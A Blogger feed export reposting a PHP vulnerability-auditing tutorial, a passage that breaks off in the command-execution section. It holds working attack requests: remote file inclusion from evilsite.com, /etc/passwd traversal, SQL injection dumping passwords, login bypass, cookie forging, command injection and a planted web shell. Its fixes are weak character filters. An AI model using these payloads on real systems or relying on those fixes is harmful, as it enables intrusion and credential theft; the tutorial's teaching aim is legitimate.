<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5810858978506140718</id><updated>2011-07-30T18:48:25.212-07:00</updated><category term='penjajahan'/><category term='SQLi'/><category term='AS'/><category term='SQLi dork'/><category term='Linux'/><title type='text'>JERICHO PARULIAN SITUMORANG</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://jerichositumorang.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5810858978506140718/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://jerichositumorang.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Jericho PS</name><uri>http://www.blogger.com/profile/10905013783242426389</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_8QcVoMNZWbc/TI5GPFjwDGI/AAAAAAAAABk/MKgAwcHpGxM/S220/100_2302+(Small).JPG'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>5</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5810858978506140718.post-6351603963867131112</id><published>2010-04-20T10:56:00.000-07:00</published><updated>2010-04-20T10:57:21.856-07:00</updated><title type='text'>Finding vulnerabilities in PHP scripts FULL</title><content type='html'>&lt;pre&gt;Name : Finding vulnerabilities in PHP scripts FULL ( with examples )&lt;br /&gt;Author : SirGod&lt;br /&gt;Email : sirgod08@gmail.com&lt;br /&gt;Contents :&lt;br /&gt;&lt;br /&gt;1) About&lt;br /&gt;2) Some stuff&lt;br /&gt;3) Remote File Inclusion&lt;br /&gt;   3.0 - Basic example&lt;br /&gt;	3.1 - Simple example&lt;br /&gt;	3.2 - How to fix&lt;br /&gt;4) Local File Inclusion&lt;br /&gt;   4.0 - Basic example&lt;br /&gt;	4.1 - Simple example&lt;br /&gt;	4.2 - How to fix&lt;br /&gt;5) Local File Disclosure/Download&lt;br /&gt;   5.0 - Basic example&lt;br /&gt;	5.1 - Simple example&lt;br /&gt;	5.2 - How to fix&lt;br /&gt;6) SQL Injection&lt;br /&gt;   6.0 - Basic example&lt;br /&gt;	6.1 - Simple example&lt;br /&gt;	6.2 - SQL Login Bypass&lt;br /&gt;	6.3 - How to fix&lt;br /&gt;7) Insecure Cookie Handling&lt;br /&gt;   7.0 - Basic example&lt;br /&gt;	7.1 - Simple example&lt;br /&gt;	7.2 - How to fix&lt;br /&gt;8) Remote Command Execution&lt;br /&gt;   8.0 - Basic example&lt;br /&gt;	8.1 - Simple example&lt;br /&gt;	8.2 - Advanced example&lt;br /&gt;	8.3 - How to fix&lt;br /&gt;9) Remote Code Execution&lt;br /&gt;   9.0 - Basic example&lt;br /&gt;   9.1 - Simple example&lt;br /&gt;	9.2 - How to fix&lt;br /&gt;10) Cross-Site Scripting&lt;br /&gt;   10.0 - Basic example&lt;br /&gt;   10.1 - Another example&lt;br /&gt;	10.2 - Simple example&lt;br /&gt;	10.3 - How to fix&lt;br /&gt;11) Authentication Bypass&lt;br /&gt;   11.0 - Basic example&lt;br /&gt;   11.1 - Via login variable&lt;br /&gt;	11.2 - Unprotected Admin CP&lt;br /&gt;	11.3 - How to fix&lt;br /&gt;12) Insecure Permissions&lt;br /&gt;   12.0 - Basic example&lt;br /&gt;   12.1 - Read the users/passwords&lt;br /&gt;	12.2 - Download backups&lt;br /&gt;	12.3 - INC files&lt;br /&gt;	12.4 - How to fix&lt;br /&gt;13) Cross Site Request Forgery&lt;br /&gt;   13.0 - Basic example&lt;br /&gt;	13.1 - Simple example&lt;br /&gt;	13.2 - How to fix&lt;br /&gt;14) Shoutz&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;    1) In this tutorial I will show you how you can find vulnerabilities in php scripts.I will not explain&lt;br /&gt;	   how to exploit the vulnerabilities,it is pretty easy and you can find info around the web.All the&lt;br /&gt;	   examples without the basic example of each category was founded in different scripts.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;    2) First,install Apache,PHP and MySQL on your computer.Addionally you can install phpMyAdmin.&lt;br /&gt;	You can install WAMP server for example,it has all in one..Most vulnerabilities need special conditions&lt;br /&gt;   to work.So you will need to set up properly the PHP configuration file (php.ini) .I will show you what&lt;br /&gt;   configuration I use and why :&lt;br /&gt;&lt;br /&gt;  safe_mode = off ( a lot of shit cannot be done with this on )&lt;br /&gt;  disabled_functions = N/A ( no one,we want all )&lt;br /&gt;  register_globals = on ( we can set variables by request )&lt;br /&gt;  allow_url_include = on ( for lfi/rfi )&lt;br /&gt;  allow_url_fopen = on ( for lfi/rfi )&lt;br /&gt;  magic_quotes_gpc = off ( this will escape ' "  \  and NUL's  with a backslash and we don't want that )&lt;br /&gt;  short_tag_open = on ( some scripts are using short tags,better on )&lt;br /&gt;  file_uploads = on ( we want to upload )&lt;br /&gt;  display_errors = on ( we want to see the script errors,maybe some undeclared variables? )&lt;br /&gt;&lt;br /&gt;     How to proceed : First,create a database to be used by different scripts.Install the script on&lt;br /&gt;   localhost and start the audit over the source code.If you found something open the web browser and&lt;br /&gt;   test it,maybe you are wrong.&lt;br /&gt;	&lt;br /&gt;&lt;br /&gt;    3) Remote File Inclusion&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	     - Tips : You can use the NULLBYTE and ? trick.&lt;br /&gt;		          You can use HTTPS and FTP to bypass filters ( http filtered )&lt;br /&gt;		&lt;br /&gt;	&lt;br /&gt;	   In PHP is 4 functions through you can include code.&lt;br /&gt;&lt;br /&gt;        require - require() is identical to include() except upon failure it will produce a fatal E_ERROR level error.&lt;br /&gt;        require_once - is identical to require() except PHP will check if the file has already been included, and if so, not include (require) it again.&lt;br /&gt;        include - includes and evaluates the specified file.&lt;br /&gt;        include_once -  includes and evaluates the specified file during the execution of the script.	&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	   3.0 - Basic example&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	      - Tips : some scripts don't accept "http" in variables,"http" word is forbbiden so&lt;br /&gt;		  you can use "https" or "ftp".&lt;br /&gt;	  &lt;br /&gt;	      - Code snippet from test.php&lt;br /&gt;		 &lt;br /&gt;		 -----------------------------------------------&lt;br /&gt;		 &lt;?php&lt;br /&gt;		 $pagina=$_GET['pagina'];&lt;br /&gt;		 include $pagina;&lt;br /&gt;		 ?&gt;&lt;br /&gt;		 -----------------------------------------------&lt;br /&gt;		&lt;br /&gt;		 - If we access the page we got some errors and some warnings( not pasted ) :&lt;br /&gt;		&lt;br /&gt;		 Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2&lt;br /&gt;&lt;br /&gt;       - We can see here that "pagina" variable is undeclared.We can set any value to "pagina" variable.Example :&lt;br /&gt;		&lt;br /&gt;		     http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt&lt;br /&gt;			&lt;br /&gt;			Now I will show why some people use ? and %00 after the link to the evil script.&lt;br /&gt;			&lt;br /&gt;		  # The "%00"&lt;br /&gt;&lt;br /&gt;		 - Code snippet from test.php&lt;br /&gt;		 &lt;br /&gt;		 -----------------------------------------------&lt;br /&gt;		 &lt;?php&lt;br /&gt;        $pagina=$_GET['pagina'];&lt;br /&gt;        include $pagina.'.php';&lt;br /&gt;        ?&gt;&lt;br /&gt;		 -----------------------------------------------&lt;br /&gt;		&lt;br /&gt;		  - So if we will request&lt;br /&gt;		 &lt;br /&gt;		     http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt&lt;br /&gt;		 &lt;br /&gt;		  Will not work because the script will try to include http://evilsite.com/evilscript.txt.php&lt;br /&gt;		 &lt;br /&gt;		  So we will add a NULLBYTE ( %00 ) and all the shit after nullbyte will not be taken in&lt;br /&gt;		  consideration.Example :&lt;br /&gt;		 &lt;br /&gt;		     http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00&lt;br /&gt;			&lt;br /&gt;		 The script will successfully include our evilscript and will throw to junk the things&lt;br /&gt;		 after the nullbyte.&lt;br /&gt;		&lt;br /&gt;		  # The "?"&lt;br /&gt;		&lt;br /&gt;		 	- Code snippet from test.php&lt;br /&gt;		 &lt;br /&gt;		 -----------------------------------------------&lt;br /&gt;		 &lt;?php&lt;br /&gt;        $pagina=$_GET['pagina'];&lt;br /&gt;        include $pagina.'logged=1';&lt;br /&gt;        ?&gt;&lt;br /&gt;		 -----------------------------------------------&lt;br /&gt;		&lt;br /&gt;		   And the logged=1 will become like a variable.But better use nullbyte.Example :&lt;br /&gt;		  &lt;br /&gt;		     http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1&lt;br /&gt;			&lt;br /&gt;		  The evilscript will be included succesfully.&lt;br /&gt;		 &lt;br /&gt;		 &lt;br /&gt;	   3.1 - Simple example	&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	       Now an example from a script.&lt;br /&gt;		  &lt;br /&gt;		    - Code snippet from index.php&lt;br /&gt;			&lt;br /&gt;		 ----------------------------------------------------&lt;br /&gt;			        if (isset($_REQUEST["main_content"])){&lt;br /&gt;           $main_content = $_REQUEST["main_content"];&lt;br /&gt;        } else if (isset($_SESSION["main_content"])){&lt;br /&gt;           $main_content = $_SESSION["main_content"];&lt;br /&gt;        }&lt;br /&gt;		   .......................etc..................&lt;br /&gt;		           ob_start();&lt;br /&gt;         require_once($main_content);&lt;br /&gt;		 ----------------------------------------------------&lt;br /&gt;		&lt;br /&gt;		    We can see that "main_content" variable is requested by $_REQUEST method.The attacker can&lt;br /&gt;		set any value that he want. Below the "main_content" variable is include.So if we make the&lt;br /&gt;		following request :&lt;br /&gt;		&lt;br /&gt;		     http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt&lt;br /&gt;			&lt;br /&gt;		  Our evil script will be successfully included.&lt;br /&gt;		 &lt;br /&gt;		 &lt;br /&gt;	   3.2 - How to fix&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	       Simple way : Don't allow special chars in variables.Simple way : filter the slash "/" .&lt;br /&gt;		   Another way : filter "http" , "https" , "ftp" and "smb".&lt;br /&gt;			&lt;br /&gt;   &lt;br /&gt;	 4) Local File Inclusion&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	      - Tips : You can use the NULLBYTE and ? trick.&lt;br /&gt;		         ../ mean a directory up&lt;br /&gt;				 On Windows systems we can use "..\" instead of "../" .The "..\" will become "..%5C" ( urlencoded ).&lt;br /&gt;	&lt;br /&gt;	   The same functions which let you to include (include,include_once,require,require_once) .&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	   4.0 - Basic example&lt;br /&gt;	  &lt;br /&gt;		 &lt;br /&gt;		   - Code snippet from test.php&lt;br /&gt;		  &lt;br /&gt;		   -----------------------------------&lt;br /&gt;		    &lt;?php&lt;br /&gt;		    $pagina=$_GET['pagina'];&lt;br /&gt;		    include '/pages/'.$pagina;&lt;br /&gt;		    ?&gt;&lt;br /&gt;		   -----------------------------------&lt;br /&gt;		  &lt;br /&gt;		     Now,we can not include our script because we can not include remote files.We can include only&lt;br /&gt;			local files as you see.So if we make the following request :&lt;br /&gt;	  &lt;br /&gt;	           http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd&lt;br /&gt;			  &lt;br /&gt;			 The script will include "/pages/../../../../../../etc/passwd" successfully.&lt;br /&gt;			&lt;br /&gt;            You can use the %00 and ? .The same story.		&lt;br /&gt;			&lt;br /&gt;			&lt;br /&gt;	   4.1 - Simple example&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	      - Code snippet from install/install.php&lt;br /&gt;		 &lt;br /&gt;		  -------------------------------------&lt;br /&gt;		   if(empty($_GET["url"]))&lt;br /&gt; 	       $url = 'step_welcome.php';&lt;br /&gt;          else&lt;br /&gt; 	       $url = $_GET["url"];&lt;br /&gt;		   .............etc.............&lt;br /&gt;		   &lt;p&gt;&lt;? include('step/'.$url) ?&gt;&lt;/p&gt;&lt;br /&gt;		  -------------------------------------&lt;br /&gt;		 &lt;br /&gt;		    We can see that "url" variable is injectable.If the "url" variable is not set&lt;br /&gt;		   (is empty) the script will include "step_welcome.php" else will include the&lt;br /&gt;		   variable set by the attacker.&lt;br /&gt;		  &lt;br /&gt;		    So if we do the following request :&lt;br /&gt;			&lt;br /&gt;			  http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd&lt;br /&gt;			 &lt;br /&gt;			The "etc/passwd" file will be succesfully included.&lt;br /&gt;			&lt;br /&gt;			&lt;br /&gt;	   4.2 - How to fix&lt;br /&gt;	   &lt;br /&gt;		&lt;br /&gt;		    Simple way : Don't allow special chars in variables.Simple way : filter the dot "."&lt;br /&gt;			Another way : Filter "/" , "\" and "." .&lt;br /&gt;			&lt;br /&gt;			&lt;br /&gt;	 5) Local File Disclosure/Download	 &lt;br /&gt;	 &lt;br /&gt;	 &lt;br /&gt;	      - Tips : Through this vulnerability you can read the content of files,not include.&lt;br /&gt;		&lt;br /&gt;		 Some functions which let you to read files :&lt;br /&gt;		&lt;br /&gt;		   file_get_contents — Reads entire file into a string&lt;br /&gt;		   readfile — Outputs a file&lt;br /&gt;		   file — Reads entire file into an array&lt;br /&gt;		   fopen — Opens file or URL&lt;br /&gt;		   highlight_file — Syntax highlighting of a file.Prints out or returns a syntax&lt;br /&gt;		                  highlighted version of the code contained in filename using the&lt;br /&gt;						  colors defined in the built-in syntax highlighter for PHP.&lt;br /&gt;		   show_source — Alias of highlight_file()&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;      5.0 - Basic example&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	      - Code snippet from test.php&lt;br /&gt;		 &lt;br /&gt;		  --------------------------------------&lt;br /&gt;		   &lt;?php&lt;br /&gt;		   $pagina=$_GET['pagina'];&lt;br /&gt;		   readfile($pagina);&lt;br /&gt;		   ?&gt;&lt;br /&gt;		   --------------------------------------&lt;br /&gt;		  &lt;br /&gt;		    The readfile() function will read the content of the specified file.So if we do the following request :&lt;br /&gt;			&lt;br /&gt;		     http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd&lt;br /&gt;			&lt;br /&gt;			The content of etc/passwd will be outputed NOT included.&lt;br /&gt;			&lt;br /&gt;			&lt;br /&gt;	   5.1 - Simple example&lt;br /&gt;&lt;br /&gt;             			&lt;br /&gt;		   - Code snippet from download.php&lt;br /&gt;		  &lt;br /&gt;		  -----------------------------------------------------------------------------------&lt;br /&gt;		  $file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];&lt;br /&gt;		  header("Pragma: public");&lt;br /&gt;		  header("Expires: 0");&lt;br /&gt;		  header("Cache-Control: must-revalidate, post-check=0, pre-check=0");&lt;br /&gt;&lt;br /&gt;		  header("Content-Type: application/force-download");&lt;br /&gt;		  header( "Content-Disposition: attachment; filename=".basename($file));&lt;br /&gt;&lt;br /&gt;		  //header( "Content-Description: File Transfer");&lt;br /&gt;		  @readfile($file);&lt;br /&gt;		  die();&lt;br /&gt;		  -----------------------------------------------------------------------------------&lt;br /&gt;		 &lt;br /&gt;		    The "file" variable is unsecure.We see in first line that it is requested by $_REQUEST method.&lt;br /&gt;		  And the file is disclosed by readfile() function.So we can see the content of an arbitrary file.&lt;br /&gt;		    If we make the following request :&lt;br /&gt;		 &lt;br /&gt;		      http://127.0.0.1/download.php?file=../../../../../../etc/passwd&lt;br /&gt;		 &lt;br /&gt;		  So we can succesfully read the "etc/passwd" file.&lt;br /&gt;		 &lt;br /&gt;		 &lt;br /&gt;	   5.2 - How to fix&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;		    Simple way : Don't allow special chars in variables.Simple way : filter the dot "."&lt;br /&gt;			Another way : Filter "/" , "\" and "." .&lt;br /&gt;		 &lt;br /&gt;		 &lt;br /&gt;	 6) SQL Injection&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	      - Tips : If the user have file privileges you can read files.&lt;br /&gt;		           If the user have file privileges and you find a writable directory and magic_quotes_gpc = off&lt;br /&gt;				  you can upload you code into a file.&lt;br /&gt;&lt;br /&gt;     &lt;br /&gt;      6.0 - Basic example	&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	      - Code snippet from test.php&lt;br /&gt;		 &lt;br /&gt;		  ----------------------------------------------------------------------------------&lt;br /&gt;		  &lt;?php&lt;br /&gt;		  $id = $_GET['id'];&lt;br /&gt;         $result = mysql_query( "SELECT name FROM members WHERE id = '$id'");&lt;br /&gt;		  ?&gt;&lt;br /&gt;		  ----------------------------------------------------------------------------------&lt;br /&gt;		 &lt;br /&gt;		   The "id" variable is not filtered.We can inject our SQL code in "id" variable.Example :&lt;br /&gt;		&lt;br /&gt;		    http://127.0.0.1/test.php?id=1+union+all+select+1,null,load_file('etc/passwd'),4--&lt;br /&gt;			&lt;br /&gt;		  And we get the "etc/passwd" file if magic_quotes = off ( escaping ' ) and users have&lt;br /&gt;		  file privileges.&lt;br /&gt;		 &lt;br /&gt;		 &lt;br /&gt;	   6.1 - Simple example&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	        - Code snippet from house/listing_view.php&lt;br /&gt;			&lt;br /&gt;			-----------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;			$id = $_GET['itemnr'];&lt;br /&gt;           require_once($home."mysqlinfo.php");&lt;br /&gt;           $query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id";&lt;br /&gt;           $result = mysql_query($query);&lt;br /&gt;			if(mysql_num_rows($result)){&lt;br /&gt;			$r = mysql_fetch_array($result);&lt;br /&gt;			-----------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;			&lt;br /&gt;			 We see that "id" variable value is the value set for "itemnr" and is not filtered in any way.&lt;br /&gt;			 So we can inject our code.Lets make a request :&lt;br /&gt;			&lt;br /&gt;			   http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users--&lt;br /&gt;			&lt;br /&gt;			 And we get the email and the password from the users table.&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	   6.2 - SQL Injection Login Bypass&lt;br /&gt;		&lt;br /&gt;		&lt;br /&gt;		   - Code snippet from /admin/login.php&lt;br /&gt;		  &lt;br /&gt;		   ------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;		    $postbruger = $_POST['username'];&lt;br /&gt;           $postpass = md5($_POST['password']);&lt;br /&gt;           $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")&lt;br /&gt;           or die("&lt;p&gt;" . mysql_error() . "&lt;/p&gt;\n");&lt;br /&gt;           ------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;		  &lt;br /&gt;		    The variables isn't properly checked.We can bypass this login.Lets inject the following username and password :&lt;br /&gt;			&lt;br /&gt;			  username : admin ' or ' 1=1&lt;br /&gt;			  password : sirgod&lt;br /&gt;			 &lt;br /&gt;			We logged in.Why?Look,the code will become&lt;br /&gt;			&lt;br /&gt;			---------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;			$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1  AND password = 'sirgod'")&lt;br /&gt;			---------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;			&lt;br /&gt;			Login bypassed.The username must be an existent username.&lt;br /&gt;			&lt;br /&gt;			&lt;br /&gt;	   6.3 - How to fix&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;		    Simple way : Don't allow special chars in variables.For numeric variables&lt;br /&gt;			            use (int) ,example $id=(int)$_GET['id'];&lt;br /&gt;			Another way : For non-numeric variables : filter all special chars used in&lt;br /&gt;           			 SQLI : - , . ( ) ' " _ + / *&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	 7) Insecure Cooke Handling&lt;br /&gt;	&lt;br /&gt;	   &lt;br /&gt;		 - Tips : Write the code in the URLbar,don't use a cookie editor for this.&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	   7.0 - Basic example&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	      - Code snippet from test.php&lt;br /&gt;		 &lt;br /&gt;		---------------------------------------------------------------&lt;br /&gt;		if($_POST['password'] == $thepass) {&lt;br /&gt;		setcookie("is_user_logged","1");&lt;br /&gt;		} else { die("Login failed!"); }&lt;br /&gt;		............ etc .................&lt;br /&gt;		if($_COOKIE['is_user_logged']=="1")&lt;br /&gt;		 { include "admin.php"; else { die('not logged'); }&lt;br /&gt;		---------------------------------------------------------------&lt;br /&gt;		&lt;br /&gt;		  Something interesting here.If we set to the "is_user_logged" variable&lt;br /&gt;		 from cookie value "1" we are logged in.Example :&lt;br /&gt;		&lt;br /&gt;		 javascript:document.cookie = "is_user_logged=1; path=/";&lt;br /&gt;		&lt;br /&gt;		 So practically we are logged in,we pass the check and we can access the admin panel.&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	   7.1 - Simple example&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	    - Code snippet from admin.php&lt;br /&gt;		&lt;br /&gt;		----------------------------------------------------------------&lt;br /&gt;		if ($_COOKIE[PHPMYBCAdmin] == '') {&lt;br /&gt;		if (!$_POST[login] == 'login') {&lt;br /&gt;		die("Please Login:&lt;br /&gt;&lt;form method="post"&gt;&lt;input type=password&lt;br /&gt;		name=password&gt;&lt;input type="hidden" value="login" name="login"&gt;&lt;input&lt;br /&gt;		type=submit&gt;&lt;/form&gt;");&lt;br /&gt;		} elseif($_POST[password] == $bcadminpass) {&lt;br /&gt;		setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);&lt;br /&gt;		header("Location: admin.php"); } else { die("Incorrect"); }&lt;br /&gt;		}&lt;br /&gt;		----------------------------------------------------------------	&lt;br /&gt;			&lt;br /&gt;		  Code looks exploitable.We can set a cookie value that let us to bypass the login&lt;br /&gt;		 and tell to the script that we are already logged in.Example :&lt;br /&gt;		&lt;br /&gt;		 javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";document.cookie = "1246371700; path=/";&lt;br /&gt;		&lt;br /&gt;		  What is 1246371700? Is the current time() echo'ed + 360.&lt;br /&gt;		 &lt;br /&gt;		 &lt;br /&gt;	   7.2 - How to fix&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	        Simple way : The most simple and eficient way : use SESSIONS .&lt;br /&gt;		 &lt;br /&gt;		 &lt;br /&gt;	 8) Remote Command Execution&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	     - Tips : If in script is used exec() you can't see the command output(but the command is executed)&lt;br /&gt;        until the result isn't echo'ed from script.&lt;br /&gt;		          You can use AND operator ( || ) if the script execute more than one command .&lt;br /&gt;	&lt;br /&gt;	   In PHP are some functions that let you to execute commands :&lt;br /&gt;&lt;br /&gt;      exec — Execute an external program&lt;br /&gt;      passthru — Execute an external program and display raw output&lt;br /&gt;      shell_exec — Execute command via shell and return the complete output as a string&lt;br /&gt;      system — Execute an external program and display the output&lt;br /&gt;		&lt;br /&gt;		&lt;br /&gt;	   8.0 - Basic example&lt;br /&gt;	&lt;br /&gt;	     - Code snippet from test.php&lt;br /&gt;		&lt;br /&gt;		 ---------------------------------&lt;br /&gt;		 &lt;?php&lt;br /&gt;		 $cmd=$_GET['cmd'];&lt;br /&gt;		 system($cmd);&lt;br /&gt;		 ?&gt;&lt;br /&gt;		 ---------------------------------&lt;br /&gt;		&lt;br /&gt;		 So if we make the following request :&lt;br /&gt;		&lt;br /&gt;		  http://127.0.0.1/test.php?cmd=whoami&lt;br /&gt;		 &lt;br /&gt;		The command will be executed and the result will be outputed.&lt;br /&gt;		&lt;br /&gt;		&lt;br /&gt;	   8.1 - Simple example&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	     - Code snippet from dig.php&lt;br /&gt;		&lt;br /&gt;		    -------------------------------------------------------------------------------------------&lt;br /&gt;		    $status = $_GET['status'];&lt;br /&gt;		    $ns  = $_GET['ns'];&lt;br /&gt;		    $host   = $_GET['host'];&lt;br /&gt;		    $query_type   = $_GET['query_type']; // ANY, MX, A , etc.&lt;br /&gt;		    $ip     = $_SERVER['REMOTE_ADDR'];&lt;br /&gt;		    $self   = $_SERVER['PHP_SELF'];&lt;br /&gt;		    ........................ etc ........................&lt;br /&gt;		    $host = trim($host);&lt;br /&gt;		    $host = strtolower($host);&lt;br /&gt;		    echo("&lt;span class="\"&gt;&lt;b&gt;Executing : &lt;u&gt;dig @$ns $host $query_type&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;");&lt;br /&gt;		    echo '&lt;pre&gt;';&lt;br /&gt;	        system ("dig @$ns $host $query_type");&lt;br /&gt;			-------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;			 The "ns" variable is unfiltered and can be specified by the attacker.An attacker can use any command&lt;br /&gt;          that he want through this variable.&lt;br /&gt;		  &lt;br /&gt;		     Lets make a request :&lt;br /&gt;			&lt;br /&gt;			  http://127.0.0.1/dig.php?ns=whoam&amp;amp;host=sirgod.net&amp;amp;query_type=NS&amp;amp;status=digging&lt;br /&gt;			 &lt;br /&gt;			 The injection will fail.Why?The executed command will be : dig whoami sirgod.com NS and&lt;br /&gt;			will not work of course.Lets do something a little bit tricky.We have the AND operator&lt;br /&gt;			( || ) and we will use it to separe the commands.Example :&lt;br /&gt;		&lt;br /&gt;		      http://127.0.0.1/dig.php?ns=||whoami||&amp;amp;host=sirgod.net&amp;amp;query_type=NS&amp;amp;status=digging&lt;br /&gt;	 &lt;br /&gt;	        Our command will be executed.The command become "dig ||whoami|| sirgod.net NS".&lt;br /&gt;			&lt;br /&gt;&lt;br /&gt;      8.2 - Advanced example&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	      - Code snippet from add_reg.php&lt;br /&gt;		 &lt;br /&gt;		  -------------------------------------------------------&lt;br /&gt;		  $user = $_POST['user'];&lt;br /&gt;		  $pass1 = $_POST['pass1'];&lt;br /&gt;		  $pass2 = $_POST['pass2'];&lt;br /&gt;		  $email1 = $_POST['email1'];&lt;br /&gt;		  $email2 = $_POST['email2'];&lt;br /&gt;		  $location = $_POST['location'];&lt;br /&gt;		  $url = $_POST['url'];&lt;br /&gt;		  $filename = "./sites/".$user.".php";&lt;br /&gt;		  ...................etc......................&lt;br /&gt;		  $html = "&lt;?php&lt;br /&gt;		  \$regdate = \"$date\";&lt;br /&gt;		  \$user = \"$user\";&lt;br /&gt;		  \$pass = \"$pass1\";&lt;br /&gt;		  \$email = \"$email1\";&lt;br /&gt;		  \$location = \"$location\";&lt;br /&gt;		  \$url = \"$url\";&lt;br /&gt;		  ?&gt;";&lt;br /&gt;		  $fp = fopen($filename, 'a+');&lt;br /&gt;		  fputs($fp, $html) or die("Could not open file!");&lt;br /&gt;		  -------------------------------------------------------&lt;br /&gt;      	&lt;br /&gt;		  We can see that the script creates a php file in "sites" directory( ourusername.php ).&lt;br /&gt;         The script save all the user data in that file so we can inject our evil code into one&lt;br /&gt;        field,I choose the "location" variable.&lt;br /&gt;		&lt;br /&gt;		  So if we register as an user with the location (set the "location" value) :&lt;br /&gt;&lt;br /&gt;           &lt;?php system($_GET['cmd']); ?&gt;&lt;br /&gt;&lt;br /&gt;        the code inside sites/ourusername.php will become :&lt;br /&gt;		&lt;br /&gt;          -------------------------------------------------&lt;br /&gt;          &lt;?php&lt;br /&gt;          $regdate = "13 June 2009, 4:16 PM";&lt;br /&gt;          $user = "pwned";&lt;br /&gt;          $pass = "pwned";&lt;br /&gt;          $email = "pwned@yahoo.com";&lt;br /&gt;          $location = "&lt;?php system($_GET['cmd']); ?&gt;";&lt;br /&gt;          $url = "http://google.ro";&lt;br /&gt;          ?&gt;&lt;br /&gt;		   -------------------------------------------------&lt;br /&gt;&lt;br /&gt;         So we will get an parse error.Not good.We must inject a proper code to get the result that we want.&lt;br /&gt;&lt;br /&gt;        Lets inject this code :&lt;br /&gt;&lt;br /&gt;           \";?&gt;&lt;?php system(\$_GET['cmd']);?&gt;&lt;?php \$xxx=\":D&lt;br /&gt;&lt;br /&gt;        So the code inside sites/ourusername.php will become :&lt;br /&gt;		&lt;br /&gt;          --------------------------------------------------------------&lt;br /&gt;          &lt;?php&lt;br /&gt;          $regdate = "13 June 2009, 4:16 PM";&lt;br /&gt;          $user = "pwned";&lt;br /&gt;          $pass = "pwned";&lt;br /&gt;          $email = "pwned@yahoo.com";&lt;br /&gt;          $location = "";?&gt;&lt;?php system($_GET['cmd']);?&gt;&lt;?php $xxx=":D";&lt;br /&gt;          $url = "http://google.ro";&lt;br /&gt;          ?&gt;&lt;br /&gt;		   --------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;        and we will have no error.Why?See the code :&lt;br /&gt;&lt;br /&gt;	      $location = "";?&gt;&lt;?php system($_GET['cmd']);?&gt;&lt;?php $xxx=":D";&lt;br /&gt;		 &lt;br /&gt;        Lets split it :&lt;br /&gt;&lt;br /&gt;        -------------------------------&lt;br /&gt;        $location = "";&lt;br /&gt;        ?&gt;&lt;br /&gt;        &lt;?php system($_GET['cmd']);?&gt;&lt;br /&gt;        &lt;?php $xxx=":D";&lt;br /&gt;		 -------------------------------&lt;br /&gt;